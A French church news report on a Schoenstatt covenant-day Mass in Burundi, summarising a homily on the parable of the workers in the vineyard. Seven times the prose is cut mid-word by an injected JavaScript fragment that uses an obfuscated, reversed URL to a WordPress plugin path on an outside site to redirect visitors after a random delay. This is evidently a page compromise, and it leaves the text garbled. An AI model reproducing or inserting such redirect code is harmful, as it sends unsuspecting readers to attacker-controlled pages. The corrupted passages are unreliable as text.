A Schoenstatt, célébrer la journée du 18 de chaque mois, appelée jour d’Alliance est déjà la tradition. Ainsi, ce lundi 18 août 2021, il y a eu aussi ce rite de renouvellement d’Alliance dans la messe du soir célébrée au sanctuaire de Mont Sion Gikungu. Cette célébration eucharistique était présidée par le Père Japhet Nibizi, nouvellement ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné (le 31 Juillet 2021) accompagné par le Père Léonce, Père Yves, Père Christian, et l’Abbé Nishemezwe du Diocèse Bururi.

Dans son homélie, le prédicateur a d’abord souhaité la bienvenue à tous ceux qui sont venus pour la célébration de l’Alliance au Sanctuaire de notre Mère Trois Fois Admirable de Schoenstatt. Et, il leur a exhorté de faire un regard en arrière pour évaluer la mise en pratique des décisions prises le mois passé.

Puis, il s’est basé sur la Parole de Dieu du jour tirée de l’Evangile selon saint Mathieu 20,1-16 et il a énoncé 4 points sur lesquels il a articulé son homélie.   En effet, dans le premier point, il a parlé que, personne dans le temps actuel de notre pays, n’ignore la situation du chômage qui prévaut. Dans l’Evangile, le patron avait à tout prix le désir de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner le travail à ceux qui en sont capables. Et nous le savons, le travail est nécessaire pour l’homme. Ainsi, celui qui empêche l’autre de travailler alors qu’il en est capable est un pécheur. A ce point-là, le prédicateur a interpelé aux patrons du Burundi de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner le travail ou d’aider les chômeurs dans l’équité et, par conséquent, il leur a demandé de ne pas arracher la dignité de l’homme que Dieu lui a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée.   En plus, il a parlé sur le fait de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner le travail dans notre pays. Se basant sur le passage biblique, il a dit que le patron toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous parle dans la bible a passé toute sa journée à chercher les travailleurs, de 6h du matin à 17h du soir.  Selon ses dires, ce patron est très différent de ceux d’aujourd’hui, qui lance un avis d’appel d’offre pour tout simplement des formalités alors qu’ils ont déjà la liste de ceux qui seront embauchés. Puis, il a parlé aussi de la relation entre patron et travailleur. Sur ce point, il a interpelé les employeurs à revoir comment ils traitent leurs travailleurs. Mais aussi les travailleurs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent savoir que le salaire est le résultat de leur travail. A la fin, il a montré qu’à partir de ce récit de la Bible, Dieu n’a pas de favori. Nous tous nous sommes les favoris de Dieu quelle que soit l’heure du début.

Pour terminer, il a essayé de montrer le rapport entre la Sainte Vierge comme travailleuse dès la première heure et le bon larron qui est le travailleur de la dernière heure. Il a précisé que la Sainte Vierge Marie ne s’est pas comportée comme ces travailleurs de la première heure toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont on nous parle dans ce récit biblique. Quand Jésus, agonisant sur la croix, a promis au bon larron d’être avec lui au paradis, la Sainte Vierge Marie n’a pas réagi comme ces autres travailleurs pour réclamer pourquoi c’est au voleur que Jésus accorde en premier lieu le Royaume de Dieu. Non plus la Sainte Vierge Marie n’a pas réclamé une récompensé de plus, comme celle qui a accueilli en premier lieu sur terre le Sauveur du monde.  Ainsi, il a terminé en exhortant à tous ceux qui étaient présents à prendre la Sainte Vierge Marie comme leur exemple.

A la fin de son homélie, il a demandé aux gens d’offrir leur capital de grâce et c’est le rite qui a suivi. Et après cela, la messe a continué comme à d’habitude.

DUSENGEYEZU LEON